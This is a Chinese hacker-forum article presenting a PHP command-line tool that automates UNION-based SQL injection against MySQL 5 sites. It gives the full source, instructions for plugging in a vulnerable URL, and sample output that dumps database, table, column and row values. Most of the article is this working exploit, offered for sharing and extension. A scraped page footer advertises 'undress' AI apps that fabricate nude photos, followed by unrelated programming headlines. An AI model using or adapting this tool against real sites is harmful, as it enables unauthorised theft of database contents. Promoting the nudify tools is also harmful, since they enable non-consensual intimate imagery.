php+mysql 5 sql injection 暴取工具beta版
文章作者:mika 来自于:邪恶八进制
mysql出来5版本以后,注入漏洞要比以前更容易利用了,也可以像mssql那样直接暴取了(甚至比mssql更容易了,因为mssql暴取是需要错误提示开启的,如果错误提示关闭的话,是需要暴力猜解的,而mysql的只要你找准注入点只要可以union出任何一个字段能在页面显示出来就可以了)。自从读了flyh4t的文章《Mysql5注射技巧总结》就一直想测试一下,结果我发现很多的站都更新到了这个版本,于是测试得不易乐呼~~~ 为了节省力气,自然是运用了自己所学的知识写个简单的工具自动暴取,比起手工来要省事多了。觉得会有许多朋友需要这样的工具,我虽然在网上找过包括最新的 pangolin,但是测试结果都不尽如人意。还是自己写的用起来顺手。其实代码没什么技术,但是本着共享的精神,算是提供个工具给大家吧,大家不要笑我哦
工具是php写的(因为俺觉得就这个写起来方便),代码如下:
error_reporting(7);
echo " Mysql ver 5 sql injection exploiter
coded by Mika[EST]
";
if($argc>7 || $argc {
echo Usage:$argv[0] -t [table] [-f
INFO;
die;
}
//****************************************************************************
$url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
$db_name="vuldb";
//****************************************************************************
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
function find_value($url){
global $curl;
//echo $url."
";
curl_setopt($curl,CURLOPT_URL,$url);
$content=curl_exec($curl);
//echo $content;
$re=preg_match("/(||.+?||)/i",$content,$result);
//echo $content;
if($re)
{
//return str_replace(||,,$result[1]);
return $result[1];
}
return 0;
}
function str2ascii($str){
$temp="char(";
for($i=0;$i
$temp.=ord($str[$i]).,;
}
$temp.=ord($str[strlen($str)-1]).);
//echo $temp."
";
return $temp;
}
function exploit_db(){
global $url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,SCHEMA_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.SCHEMATA%20limit%20MIKA_MIKA,1/*";
$i=0;
echo "DATABASES:
";
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_tab(){
global $url,$db_name,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,TABLE_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=".str2ascii($db_name)."%20limit%20MIKA_MIKA,1/*";
echo "Tables of database ".strtoupper($db_name)." :
";
$i=0;
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_field(){
global $table_name,$url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,COLUMN_NAME,0x7C7C),$url);
$new_url.="%20from%20information_schema.COLUMNS%20where%20TABLE_NAME=".str2ascii($table_name)."%20limit%20MIKA_MIKA,1/*";
$i=0;
echo "columns of table ".strtoupper($table_name)." :
";
do{
$new=str_replace(MIKA_MIKA,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
function exploit_value($mode=0){
global $db_name,$table_name,$field_name,$condition,$url,$curl;
$new_url=str_replace(MIKA_MIKA,concat(0x7C7C,MIKA_MIKA,0x7C7C),$url);
if($mode)
{
$new_url.="%20from%20$db_name.$table_name%20where%20$condition/*";
$new=str_replace(MIKA_MIKA,$field_name,$new_url);
$v1=find_value($new);
echo $v1."
";
return;
}
$new_url.="%20from%20$db_name.$table_name%20limit%20MIKA_NUM,1/*";
$new_url=str_replace(MIKA_MIKA,$field_name,$new_url);
$i=0;
echo "$field_name values of table ".strtoupper($table_name)." :
";
do{
$new=str_replace(MIKA_NUM,$i,$new_url);
if($v1=find_value($new))
echo $v1."
";
$i++;
}while($v1);
}
switch($argc){
case 2:
if($argv[1]==-t)
exploit_tab();
if($argv[1]==-d)
exploit_db();
break;
case 3:
$table_name=$argv[2];
exploit_field();
break;
case 5:
case 6:
$table_name=$argv[2];
$field_name=$argv[4];
exploit_value();
break;
case 7:
$table_name=$argv[2];
$field_name=$argv[4];
$condition=$argv[6];
exploit_value(1);
break;
}
?>
代码非常简单,而且我省了很多的力,只是一个非常粗糙的版本,完全是怎么方便怎么来的。但是满足暴取字段值什么的足够了,下面我简单解释一下吧:
在两个//*********之间的参数是需要直接在代码中修改的,因为太长了,放到命令行下改太麻烦,所以还是直接放代码里好。其中$url很明显就是有漏洞的url,要连union一起,就像代码里写的那样,如下:
http://www.vul.com/display_msg.p ... 0union%20select%201,2,3,4,5,6,7,8
比如第6个数字会在页面上显示,那么你就将数字6替换成“MIKA_MIKA”,而且最后不要跟注释符(因为程序会在提交的时候自动加上),最终的url如下:
$url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
另外$db_name是数据库名字,你可以直接用database()函数获取到,然后填到这里。
填完以后就可以用了,非常简单。打开cmd,切换到程序所在的目录,比如说暴取所有的数据库,可以这样用:
F:scriptsphpmine>php mysql5.php -d
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
DATABASES:
||information_schema||
||vuldb||
暴取表名:
F:scriptsphpmine>php mysql5.php -t
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
Tables of database VULDB :
||Articles||
||Audio||
.
.
.
省略
.
.
.
暴取字段名:
F:scriptsphpmine>php mysql5.php -t Articles
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
columns of table ARTICLES :
||ID||
||Article_ID||
||Title||
||Type||
.
.
.
省略
.
.
.
暴取值:
F:scriptsphpmine>php mysql5.php -t Articles -f Type
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
Type values of table ARTICLES :
||2||
||1||
.
.
.
省略
.
.
.
另外你想加入自己的条件的话,可以在最后在加上-c参数然后再跟上where条件来限定(不要带where),比如:
F:scriptsphpmine>php mysql5.php -t Articles -f ID -c Type=2
Mysql ver 5 sql injection exploiter
coded by Mika[EST]
||58||
程序很简陋,但基本功能算是有了,俺也只是想到哪写到哪,所以以后有什么完善一定拿上来跟大家分享。代码里难免有错误和可以改进的地方,还请大家多帮忙一起修改。另外,代码里有这一行:
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
这是为了使用代理的,如果不需要可以直接注释掉。
声明:转载请保持完整,另外真的希望大家都不要太吝啬,有了修改有了添加,还希望能拿出来跟大家一起分享,虽然俺的代码不怎么样
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to manually trigger the onBlur event of a cell in Avue-crud row editing mode?
Apr 04, 2025 pm 02:00 PM
The onBlur event that implements Avue-crud row editing in the Avue component library manually triggers the Avue-crud component. It provides convenient in-line editing functions, but sometimes we need to...
Gitee Pages static website deployment failed: How to troubleshoot and resolve single file 404 errors?
Apr 04, 2025 pm 11:54 PM
GiteePages static website deployment failed: 404 error troubleshooting and resolution when using Gitee...
How to quickly build a foreground page in a React Vite project using AI tools?
Apr 04, 2025 pm 01:45 PM
How to quickly build a front-end page in back-end development? As a backend developer with three or four years of experience, he has mastered the basic JavaScript, CSS and HTML...
How to create a React application with pnpm instead of npm?
Apr 04, 2025 pm 06:45 PM
About using pnpm instead of npm to create a React application using npx...
How to use JavaScript plug-in to achieve the effect of page fixation and element independent movement?
Apr 04, 2025 pm 12:51 PM
Implementing the page fixing effect of independently moving scroll bars and elements In web design, sometimes we need to achieve a special effect, that is, when the scroll bars scroll...
SQL with Python/R: Integrating Databases for Advanced Analytics
Apr 03, 2025 am 12:02 AM
The integration of SQL and Python/R can be implemented through libraries and APIs. 1) In Python, use the sqlite3 library to connect to the database and execute queries. 2) In R, use DBI and RSQLite packages to perform similar operations. Mastering these technologies can improve data processing capabilities.
How to effectively modify and replay requested cookies in Chrome DevTools?
Apr 04, 2025 pm 05:48 PM
How to effectively modify and replay requested cookies in ChromeDevTools using Chrome...
How to achieve gap effect on the card and coupon layout with gradient background?
Apr 05, 2025 am 07:48 AM
Realize the gap effect of card coupon layout. When designing card coupon layout, you often encounter the need to add gaps on card coupons, especially when the background is gradient...
